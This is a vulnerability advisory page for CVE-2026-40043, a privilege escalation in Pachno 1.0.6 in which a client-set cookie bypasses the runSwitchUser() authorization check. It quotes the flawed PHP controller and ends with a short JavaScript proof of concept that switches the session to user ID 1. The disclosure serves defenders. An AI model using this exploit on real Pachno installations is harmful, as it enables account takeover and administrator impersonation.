Vulners
Lucene search
Pachno 1.0.6 (runSwitchUser()) Remote Vertical Privilege Escalation
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2026-40043 | 13 Apr 202618:11 | – | attackerkb |
 | CVE-2026-40043 | 13 Apr 202620:21 | – | circl |
 | Pachno 安全漏洞 | 13 Apr 202600:00 | – | cnnvd |
 | CVE-2026-40043 | 13 Apr 202618:11 | – | cve |
 | CVE-2026-40043 Pachno 1.0.6 Authentication Bypass via runSwitchUser() | 13 Apr 202618:11 | – | cvelist |
 | EUVD-2026-22051 | 13 Apr 202621:30 | – | euvd |
 | CVE-2026-40043 | 13 Apr 202619:16 | – | nvd |
 | PT-2026-32497 | 13 Apr 202600:00 | – | ptsecurity |
 | CVE-2026-40043 Pachno 1.0.6 Authentication Bypass via runSwitchUser() | 13 Apr 202618:11 | – | vulnrichment |
<html><body><p>Pachno 1.0.6 (runSwitchUser()) Remote Vertical Privilege Escalation
Vendor: Daniel André Eikeland
Product web page: https://github.com/pachno/pachno
Affected version: 1.0.6
Summary: Pachno is an open-source collaboration platform (formerly known as The Bug
Genie) designed for team project management, issue tracking, and documentation. It
offers a module-based, customizable environment for software development and team
workflows, distributed under the Mozilla Public License.
Desc: The authorization check in the runSwitchUser() action evaluates the expression
!canSaveConfiguration() && !hasCookie('original_username') and only forbids the request
when both subexpressions are true. The presence of the original_username cookie is
sufficient to satisfy the second condition, and that cookie is fully client-controlled.
An authenticated low-privilege user who sets original_username to any value and then
issues a request to switch to user ID 1 receives a fresh session token (token authentication)
or password hash cookie (password authentication) belonging to the target user. This
can be exploited to elevate privileges to administrator and impersonate arbitrary user
accounts.
=====================================================================================
/core/modules/auth/controllers/Authentication.php:
--------------------------------------------------
/**
* Switch user action
*
* @Route(name="switch_to_user", url="/userswitch/switch/:user_id/:csrf_token")
* @CsrfProtected
*
* @param framework\Request $request
*/
public function runSwitchUser(framework\Request $request)
{
if (!$this->getUser()->canSaveConfiguration() && !$request->hasCookie('original_username'))
return $this->forward403();
$response = $this->getResponse();
$authentication_backend = framework\Settings::getAuthenticationBackend();
if ($request['user_id']) {
$user = new entities\User($request['user_id']);
if ($authentication_backend->getAuthenticationMethod() == framework\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {
$response->setCookie('original_username', $request->getCookie('username'));
$response->setCookie('original_session_token', $request->getCookie('session_token'));
framework\Context::getResponse()->setCookie('username', $user->getUsername());
framework\Context::getResponse()->setCookie('session_token', $user->createUserSession()->getToken());
} else {
$response->setCookie('original_username', $request->getCookie('username'));
$response->setCookie('original_password', $request->getCookie('password'));
framework\Context::getResponse()->setCookie('password', $user->getHashPassword());
framework\Context::getResponse()->setCookie('username', $user->getUsername());
}
} else {
if ($authentication_backend->getAuthenticationMethod() == framework\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {
$response->setCookie('username', $request->getCookie('original_username'));
$response->setCookie('session_token', $request->getCookie('original_session_token'));
framework\Context::getResponse()->deleteCookie('original_session_token');
framework\Context::getResponse()->deleteCookie('original_username');
} else {
$response->setCookie('username', $request->getCookie('original_username'));
$response->setCookie('password', $request->getCookie('original_password'));
framework\Context::getResponse()->deleteCookie('original_password');
framework\Context::getResponse()->deleteCookie('original_username');
}
}
$this->forward($this->getRouting()->generate('home'));
}
=====================================================================================
Tested on: GNU/Linux
Apache2
PHP/7.4
MySQL/5.7 (MariaDB)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5985
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5985
06.04.2026
--
document.cookie = "original_username=liquidworm; path=/";
const csrf = document.querySelector('input[name="csrf_token"]')?.value
|| document.querySelector('meta[name="csrf-token"]')?.content;
fetch('/switch_user', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent' : 'AuthorizationBypassium/1.12.04' },
body: `user_id=1&csrf_token=${encodeURIComponent(csrf)}`
}).then(() => {
window.location.href = '/configure';
});
// If you 'see' /configure, you are admin.
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.5
CVSS 47.1
EPSS0.00084
SSVC